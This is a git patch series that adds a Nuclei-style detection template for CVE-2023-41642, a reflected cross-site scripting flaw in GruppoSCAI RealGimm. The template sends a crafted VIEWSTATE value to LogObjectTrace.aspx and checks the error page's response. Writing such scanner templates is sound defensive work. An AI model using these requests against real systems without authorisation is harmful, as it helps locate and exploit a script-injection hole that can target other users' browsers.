From 072802c4dc710ddc887652a00d279e4ea1a87f64 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 9 Oct 2023 14:46:15 +0530 Subject: [PATCH 1/3] Create CVE-2023-41642.yaml --- http/cves/2023/CVE-2023-41642.yaml | 50 ++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2023/CVE-2023-41642.yaml diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml new file mode 100644 index 00000000000..986a192ef3b --- /dev/null +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-41642 + +info: + name: RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter. + reference: + - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-41642 + classification: + cve-id: CVE-2023-41642 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-79 + metadata: + max-request: 2 + tags: cve,cve2023,realgimm,xss + +http: + - raw: + - | + POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: + + __EVENTTARGET=T1bPulsantiera&EVENTARGUMENT=TlbPulsantiera_Item_0%3AUP&___VIEWSTATE='TESTING&LeftArea%3ALeftMenu_hidden=&T1bPulsantiera_CancelClick=false&TlbPulsantiera_hidden=&cbUtente=&txtDataRichiestaDa=&txtDataRichiestaA=&TopArea%3ATopMenu= + + - | + GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1 + Host: {{Hostname}} + User-Agent: + + host-redirects: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '' + - 'Invalid_Viewstate' + condition: and + + - type: word + part: header_2 + words: + - text/html From 4b845fa739f30b1ca8657213585030416ffee930 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 9 Oct 2023 15:11:28 +0530 Subject: [PATCH 2/3] Update CVE-2023-41642.yaml From 8bcc6185a4167ccb82ae395701fc21bc396b0710 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 9 Oct 2023 15:12:01 +0530 Subject: [PATCH 3/3] Update CVE-2023-41642.yaml